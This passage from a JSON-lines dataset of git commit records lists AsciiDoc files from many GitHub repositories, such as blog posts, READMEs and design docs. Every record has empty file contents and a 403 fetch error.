camel,apache\/camel,gnodet\/camel,DariusX\/camel,zregvart\/camel,tdiesler\/camel,zregvart\/camel,alvinkwekel\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,zregvart\/camel,tdiesler\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,tdiesler\/camel,apache\/camel,nicolaferraro\/camel,DariusX\/camel,mcollovati\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/Endpoint-dsl.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/Endpoint-dsl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4addd9c0ad4e167e3cd5f920049cc8b63e251adb","subject":"Update 2016-12-05-Tytul.adoc","message":"Update 2016-12-05-Tytul.adoc","repos":"tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io","old_file":"_posts\/2016-12-05-Tytul.adoc","new_file":"_posts\/2016-12-05-Tytul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tr00per\/tr00per.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"447c32b458658d88da9593f9ddc97c7e7db4f917","subject":"y2b create post My Ultimate Setup - Episode 3","message":"y2b create post My Ultimate Setup - Episode 3","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-21-My-Ultimate-Setup--Episode-3.adoc","new_file":"_posts\/2015-12-21-My-Ultimate-Setup--Episode-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"634723c8aeb1afc245667a52a04e17981174e70e","subject":"y2b create post FINALLY THE ULTIMATE BATTERY","message":"y2b create post FINALLY THE ULTIMATE BATTERY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-17-FINALLY-THE-ULTIMATE-BATTERY.adoc","new_file":"_posts\/2016-06-17-FINALLY-THE-ULTIMATE-BATTERY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef4c980f066887018e11dc6d7dfbad86c5e2f1db","subject":"get the Manpage build status icon right","message":"get the Manpage build status icon right","repos":"ArcEye\/MK-Qt5,araisrobo\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b9359a6b1a52133fc43dc38cde28e091948346b6","subject":"Add RCA document template (#37)","message":"Add RCA document template (#37)\n\n* Add RCA document template\r\n\r\n* Add pointers in the RCA template based on comments from @polynomial\r\n","repos":"mbbx6spp\/styleguides","old_file":"docs\/RCA.adoc","new_file":"docs\/RCA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbbx6spp\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a072b5e4a20b3f893f895d93ef1c65a91d1bd621","subject":"#169: added README for search","message":"#169: added README for search\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"search\/README.adoc","new_file":"search\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db29c7d9a9b201228e4735e78b71a4f5371bfae2","subject":"Documentation: remove dead link to groovy-contributions","message":"Documentation: remove dead link to groovy-contributions\n","repos":"apache\/groovy,jwagenleitner\/incubator-groovy,pledbrook\/incubator-groovy,armsargis\/groovy,upadhyayap\/incubator-groovy,paulk-asert\/groovy,russel\/groovy,apache\/groovy,russel\/groovy,armsargis\/groovy,alien11689\/incubator-groovy,shils\/incubator-groovy,jwagenleitner\/groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,armsargis\/groovy,bsideup\/incubator-groovy,jwagenleitner\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,russel\/incubator-groovy,alien11689\/incubator-groovy,shils\/groovy,russel\/incubator-groovy,bsideup\/incubator-groovy,avafanasiev\/groovy,paulk-asert\/incubator-groovy,dpolivaev\/groovy,avafanasiev\/groovy,russel\/incubator-groovy,shils\/groovy,upadhyayap\/incubator-groovy,pledbrook\/incubator-groovy,shils\/incubator-groovy,apache\/groovy,tkruse\/incubator-groovy,fpavageau\/groovy,jwagenleitner\/groovy,graemerocher\/incubator-groovy,paulk-asert\/incubator-groovy,pledbrook\/incubator-groovy,apache\/groovy,shils\/incubator-groovy,paplorinc\/incubator-groovy,tkruse\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,paulk-asert\/groovy,traneHead\/groovy-core,shils\/incubator-groovy,russel\/groovy,jwagenleitner\/incubator-groovy,apache\/incubator-groovy,fpavageau\/groovy,paplorinc\/incubator-groovy,fpavageau\/groovy,dpolivaev\/groovy,upadhyayap\/incubator-groovy,paulk-asert\/groovy,apache\/incubator-groovy,apache\/incubator-groovy,paulk-asert\/groovy,apache\/incubator-groovy,fpavageau\/groovy,bsideup\/incubator-groovy,armsargis\/groovy,graemerocher\/incubator-groovy,dpolivaev\/groovy,russel\/incubator-groovy,alien11689\/incubator-groovy,traneHead\/groovy-core,dpolivaev\/groovy,tkruse\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,avafanasiev\/groovy,bsideup\/incubator-groovy,paplorinc\/incubator-groovy,graemerocher\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,paplorinc\/incubator-groovy,upadhyayap\/incubator-groovy,russel\/groovy,avafanasiev\/groovy,tkruse\/incubator-groovy,pledbrook\/incubator-groovy","old_file":"src\/spec\/doc\/contributors.adoc","new_file":"src\/spec\/doc\/contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/armsargis\/groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a43f3cf449407eedb1de93309202efcab3cea0c","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba696a95c4f04ecf786414235ebdec8f221c4622","subject":"Update 2016-07-15-Aprendizaje-basado-en-proyectos.adoc","message":"Update 2016-07-15-Aprendizaje-basado-en-proyectos.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2016-07-15-Aprendizaje-basado-en-proyectos.adoc","new_file":"_posts\/2016-07-15-Aprendizaje-basado-en-proyectos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c66bd036cdd8a6b43153b8e55a15c5e407aa9400","subject":"Update 2017-04-26-Drift-Focus.adoc","message":"Update 2017-04-26-Drift-Focus.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9e397b3218a9a90fe1740496e2e2c78bd7fd02c","subject":"Update 2015-02-15-Indexing-large-collection-of-medical-files.adoc","message":"Update 2015-02-15-Indexing-large-collection-of-medical-files.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-15-Indexing-large-collection-of-medical-files.adoc","new_file":"_posts\/2015-02-15-Indexing-large-collection-of-medical-files.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"861557a256216dc39a89d313e2ec743684f8bea9","subject":"Update 2015-04-20-Opensource-identity-and-abandonment-issues.adoc","message":"Update 2015-04-20-Opensource-identity-and-abandonment-issues.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-04-20-Opensource-identity-and-abandonment-issues.adoc","new_file":"_posts\/2015-04-20-Opensource-identity-and-abandonment-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37358027bef9a675046869049ae36be38097d598","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29b96bd196f43e05e1dec44e76e17434a925cf25","subject":"Fixed unspecified allegory","message":"Fixed unspecified allegory\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23276d40b3d9542748afe27df9a9fcca6200f146","subject":"Create the reserved keywords CIP","message":"Create the reserved keywords CIP\n\n- Motivation\n- Description\n- Specification\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2016-12-19-Reserved-keywords.adoc","new_file":"cip\/1.accepted\/CIP2016-12-19-Reserved-keywords.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e906261b08d764dc3ee3ab095df494d9224797f8","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36c93bccfab356df9b468c82ab8885ae2e0ec303","subject":"Update 2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c44d74eae3e457ed69f3d8b9f389a6620399a32","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bc9fec1f1fe6044428b306323bb6c7f37a8e71a","subject":"Publish 2016-6-26-PHRER.adoc","message":"Publish 2016-6-26-PHRER.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER.adoc","new_file":"2016-6-26-PHRER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54acfcaa100584a4da174796539d07d09769f3db","subject":"tree to blob Maven","message":"tree to blob Maven\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Checkstyle.adoc","new_file":"Dev tools\/Checkstyle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"666a16cc3a89bb1d4d3e1af64bbeb7f53da2dceb","subject":"#432 - Added code of conduct.","message":"#432 - Added code of conduct.","repos":"JamesTPF\/spring-hateoas","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JamesTPF\/spring-hateoas.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb44596d432317bd38f05464f607de08b7fdd09e","subject":"y2b create post The 4 Dollar Android Smartphone","message":"y2b create post The 4 Dollar Android Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-11-The-4-Dollar-Android-Smartphone.adoc","new_file":"_posts\/2016-03-11-The-4-Dollar-Android-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"942155da11654b772987965c38ecde39e2f8a913","subject":"Update 2015-06-23-Ne-marche-plus.adoc","message":"Update 2015-06-23-Ne-marche-plus.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-06-23-Ne-marche-plus.adoc","new_file":"_posts\/2015-06-23-Ne-marche-plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8894f745cb304662eb2a6c9ae83d0889b4b555","subject":"Update 2020-02-06-This-is-a-test.adoc","message":"Update 2020-02-06-This-is-a-test.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-06-This-is-a-test.adoc","new_file":"_posts\/2020-02-06-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bc351f2eb4f5398c6b81d3ddb30f98532e418cc","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0740cae1503b2f368080c8f95e54bbb60af6a11a","subject":"2016-07-10-OxRunCar.adoc","message":"2016-07-10-OxRunCar.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-10-OxRunCar.adoc","new_file":"_posts\/2016-07-10-OxRunCar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"832119a9efa2e71c7012834e49eed6fba2bfa2bc","subject":"Create deployment-docker.adoc","message":"Create deployment-docker.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/platform\/includes\/deployment-docker.adoc","new_file":"userguide\/platform\/includes\/deployment-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fd57d271a73c5453bfdc7e2b5845ab8c027c1e5","subject":"Update 2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","message":"Update 2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","new_file":"_posts\/2014-06-12-Episode-8-Super-sized-Lost-in-the-Zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93f757570c820c76359ca868b36a5560a01002a6","subject":"Update 2015-06-16-Episode-19-Pitch-Slapped.adoc","message":"Update 2015-06-16-Episode-19-Pitch-Slapped.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-06-16-Episode-19-Pitch-Slapped.adoc","new_file":"_posts\/2015-06-16-Episode-19-Pitch-Slapped.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a334331d562a861ce8c504999057b938e40e042","subject":"Update 2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-19-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64071f0926f3a22839976d42c059f321042111d5","subject":"Update 2018-08-28-Reducing-network-latency.adoc","message":"Update 2018-08-28-Reducing-network-latency.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-28-Reducing-network-latency.adoc","new_file":"_posts\/2018-08-28-Reducing-network-latency.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d38a59e8399901a062deb6c84b4a6d4e675048d6","subject":"Install notes","message":"Install notes\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"591b4577e623db6affde456ec31f864bbcf593b8","subject":"Update 2016-09-05-Shapeless-Introduction-resources.adoc","message":"Update 2016-09-05-Shapeless-Introduction-resources.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-09-05-Shapeless-Introduction-resources.adoc","new_file":"_posts\/2016-09-05-Shapeless-Introduction-resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf586857467f3c5a2858a395bb062fa53315ee53","subject":"Update from adoc-editor","message":"Update from adoc-editor","repos":"asciidoctor\/docker-asciidoctorj","old_file":"2015-03-01-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"2015-03-01-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/docker-asciidoctorj.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65b49477d14cd285ccfdab745a2545200c778515","subject":"Update 2015-10-17-Loading-FITS-data-in-browser.adoc","message":"Update 2015-10-17-Loading-FITS-data-in-browser.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-10-17-Loading-FITS-data-in-browser.adoc","new_file":"_posts\/2015-10-17-Loading-FITS-data-in-browser.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d83fabc7c6dc6652b293c3af20c612c8be2ff8","subject":"Update 2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","message":"Update 2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","new_file":"_posts\/2016-07-22-Lanalyse-du-Poussin-la-carte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"650fea2ce0b4992ea9ece66faea761af77f7718d","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e2bfa418f9eefaa85d5a36975d0e3206c6d87a","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8aa8aa5b097d115841d8a9da80b543b2eaa5242c","subject":"Add authorization design doc","message":"Add authorization design doc\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/authorization.adoc","new_file":"documentation\/design_docs\/design\/authorization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34f118966b450288b7e1a337475b45355e4f5d71","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a64ba91d7ae180e10d65b645a2b727e255e8d72e","subject":"Update 2015-11-17-Reconhecimento-da-Funarte.adoc","message":"Update 2015-11-17-Reconhecimento-da-Funarte.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Reconhecimento-da-Funarte.adoc","new_file":"_posts\/2015-11-17-Reconhecimento-da-Funarte.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6987d295df3fd7d1af5e89ae51ebffc877ce7fa6","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 